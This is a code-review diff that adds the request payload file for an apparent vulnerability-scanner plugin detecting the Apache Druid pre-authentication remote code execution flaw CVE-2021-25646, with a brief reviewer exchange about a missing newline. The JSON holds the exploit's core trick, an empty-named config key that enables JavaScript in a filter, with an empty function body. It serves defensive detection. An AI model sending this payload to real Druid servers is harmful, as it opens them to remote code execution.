community/detectors/apache_druid_preauth_rce_cve_2021_25646/src/main/resources/com/google/tsunami/plugins/detectors/rce/cve202125646/payloadString.json

```diff
@@ -0,0 +1,43 @@
+{
+  "type": "index",
+  "spec": {
+    "ioConfig": {
+      "type": "index",
+      "inputSource": {
+        "type": "inline",
+        "data": "{\"isRobot\":true,\"channel\":\"#x\",\"timestamp\":\"2021-2-1T14:12:24.050Z\",\"flags\":\"x\",\"isUnpatrolled\":false,\"page\":\"1\",\"diffUrl\":\"https://xxx.com\",\"added\":1,\"comment\":\"Botskapande Indonesien omdirigering\",\"commentLength\":35,\"isNew\":true,\"isMinor\":false,\"delta\":31,\"isAnonymous\":true,\"user\":\"Lsjbot\",\"deltaBucket\":0,\"deleted\":0,\"namespace\":\"Main\"}"
+      },
+      "inputFormat": {
+        "type": "json",
+        "keepNullColumns": true
+      }
+    },
+    "dataSchema": {
+      "dataSource": "sample",
+      "timestampSpec": {
+        "column": "timestamp",
+        "format": "iso"
+      },
+      "dimensionsSpec": {},
+      "transformSpec": {
+        "transforms": [],
+        "filter": {
+          "type": "javascript",
+          "dimension": "added",
+          "function": "function(value) {}",
+          "": {
+            "enabled": true
+          }
+        }
+      }
+    },
+    "type": "index",
+    "tuningConfig": {
+      "type": "index"
+    }
+  },
+  "samplerConfig": {
+    "numRows": 500,
+    "timeoutMs": 15000
+  }
+}
```

Comment:
Please add a terminating newline character to this file.

Reply:
done.